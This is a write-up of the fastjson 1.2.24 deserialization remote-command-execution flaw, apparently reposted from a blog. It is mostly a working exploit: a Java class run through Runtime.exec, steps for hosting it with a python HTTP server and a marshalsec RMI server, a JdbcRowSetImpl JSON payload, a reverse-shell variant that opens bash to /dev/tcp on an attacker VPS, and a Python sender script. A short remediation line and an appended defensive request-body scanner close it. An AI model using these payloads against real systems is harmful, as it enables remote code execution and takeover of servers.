fastjson 1.2.24 deserialization leading to arbitrary command execution vulnerability


    Introduction

    Fastjson is a Java library that converts Java objects to JSON format; it can also convert JSON strings back into Java objects.

    Fastjson can operate on any Java object, including pre-existing objects for which no source code is available.

    PoC

    //FileName:Exploit.java
    import java.io.BufferedReader;
    import java.io.InputStream;
    import java.io.InputStreamReader;
    
    public class Exploit{
        public Exploit() throws Exception {
            Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /tmp/exphub"});
            InputStream is = p.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(is));
    
            String line;
            while((line = reader.readLine()) != null) {
                System.out.println(line);
            }
    
            p.waitFor();
            is.close();
            reader.close();
            p.destroy();
        }
    
        public static void main(String[] args) throws Exception {
        }
    }
    

    Compile it into a class file and upload that file to the VPS.

    javac Exploit.java
    

    Start an HTTP server with python3 and move the PoC class file into that directory.

    python3 -m http.server 8888
    


    Start the remote class-loading service; the remote class file can be served through either a JRMP service or an LDAP service.

    JRMP service

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vps:8888/#Exploit" 9999
    


    Construct the request that makes the target load the remote class

    POST / HTTP/1.1
    Host: your-ip:8090
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/json
    Content-Length: 160
    
    {
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://vps:9999/TouchFile",
            "autoCommit":true
        }
    }
    


    The file is created, so the command executed successfully.


    Reverse shell

    import java.io.BufferedReader;
    import java.io.InputStream;
    import java.io.InputStreamReader;
    
    public class Exploit{
        public Exploit() throws Exception {
            Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >&  /dev/tcp/vps/55555 0>&1"});
            InputStream is = p.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(is));
    
            String line;
            while((line = reader.readLine()) != null) {
                System.out.println(line);
            }
    
            p.waitFor();
            is.close();
            reader.close();
            p.destroy();
        }
    
        public static void main(String[] args) throws Exception {
        }
    }
    
    


    Tools and attachments

    Detection script:

    #FileName:fastjson-1.2.24_rce.py
    
    import sys
    import requests
    
    if len(sys.argv)!=3:
        print('+------------------------------------------------------------------------------------+')
        print('+      RMIServer: rmi://ip:port/exp                                                  +')
        print('+      LDAPServer: ldap://ip:port/exp                                                +')
        print('+------------------------------------------------------------------------------------+')
        print('+ USE: python3 <filename> <target-ip> <RMI/LDAPServer>                               +')
        print('+ EXP: python3 fastjson-1.2.24_rce.py http://1.1.1.1:8080/ ldap://2.2.2.2:88/Object  +')
        print('+ VER: fastjson<=1.2.24                                                              +')
        print('+------------------------------------------------------------------------------------+')
        sys.exit()
    
    url = sys.argv[1]
    server = sys.argv[2]
    
    headers = {
        'Host': "127.0.0.1",
        'Content-Type': "application/json",
        'Accept-Encoding': "gzip, deflate",
        'Connection': "close",
        'Accept': "*/*",
        'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
        }
     
    
    payload = '''
    {
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"%s",
            "autoCommit":true
        }
    }  
    ''' %server
    
    
    try:
        r = requests.post(url, data=payload, headers=headers, timeout=10)
        print("[+] RMI/LDAP Send Success ")
    except requests.RequestException:
        # only network/HTTP failures are reported; other exceptions still propagate
        print("[-] RMI/LDAP Send Failed ")
    
    
    python fastjson-1.2.24_rce.py
    


    Remediation

    Upgrade fastjson to the latest version.
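    As a detection-side complement to upgrading, the following is an added Python example (not part of the original post and not fastjson's own code) that screens a JSON request body for the autoType marker used by the payload in this post: it walks the parsed body, records every "@type" key with its path, and flags the combination of the JdbcRowSetImpl class with an rmi:// or ldap:// dataSourceName. The gadget class list and the scheme list are assumptions taken only from the payload shown above, and the sample bodies are constructed for the example.

```python
"""Request-body screening for the fastjson autoType gadget pattern shown in this post.

Added example (not from the original post). The class and scheme lists below are
assumptions taken from the post's payload, not a complete gadget catalogue.
"""
import json
import re
from typing import Any, Dict, List

# Gadget class named in this post's payload (assumption: a real deployment would extend this).
SUSPICIOUS_TYPES = {
    "com.sun.rowset.JdbcRowSetImpl",
}

# URL schemes named in this post that make JdbcRowSetImpl perform a JNDI lookup.
JNDI_SCHEME = re.compile(r"^(rmi|ldap)://", re.IGNORECASE)


def find_autotype_markers(node: Any, path: str = "$") -> List[Dict[str, str]]:
    """Recursively collect every JSON object carrying an "@type" key, with its path."""
    hits: List[Dict[str, str]] = []
    if isinstance(node, dict):
        if "@type" in node:
            hits.append({"path": path, "type": str(node["@type"]),
                         "dataSourceName": str(node.get("dataSourceName", ""))})
        for key, value in node.items():
            hits.extend(find_autotype_markers(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_autotype_markers(value, f"{path}[{i}]"))
    return hits


def classify_body(body: str) -> Dict[str, Any]:
    """Return a verdict for one request body.

    verdict: "clean"       -> no "@type" key anywhere
             "autotype"    -> "@type" present, but no known gadget/JNDI combination
             "jndi_gadget" -> known gadget class with an rmi:// or ldap:// dataSourceName
             "unparseable" -> not valid JSON for json.loads (fastjson is more lenient,
                              so such bodies deserve a manual look rather than a pass)
    """
    try:
        parsed = json.loads(body)
    except (ValueError, TypeError):
        return {"verdict": "unparseable", "markers": []}
    markers = find_autotype_markers(parsed)
    if not markers:
        return {"verdict": "clean", "markers": []}
    for m in markers:
        if m["type"] in SUSPICIOUS_TYPES and JNDI_SCHEME.match(m["dataSourceName"]):
            return {"verdict": "jndi_gadget", "markers": markers}
    return {"verdict": "autotype", "markers": markers}


# Constructed sample bodies; the first mirrors the payload shown in this post.
SAMPLES = {
    "gadget": '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
              '"dataSourceName":"rmi://vps:9999/TouchFile","autoCommit":true}}',
    "nested": '[{"x":1},{"y":{"z":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
              '"dataSourceName":"ldap://vps:1389/Object","autoCommit":true}}}]',
    "benign_autotype": '{"@type":"com.example.Dto","name":"alice"}',
    "clean": '{"name":"alice","roles":["user"]}',
    "garbage": '{"b":{"@type":',
}


def scan_samples() -> Dict[str, str]:
    """Classify each sample body and return name -> verdict."""
    return {name: classify_body(body)["verdict"] for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:16s} {verdict}")
```

    The check runs on the raw body before it reaches the deserializer, so it can be placed in a WAF rule or a logging filter; because fastjson accepts input that strict JSON parsers reject, an "unparseable" verdict is a signal to inspect, not a clean result.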


Original article: https://www.cnblogs.com/dyanbk/p/14281460.html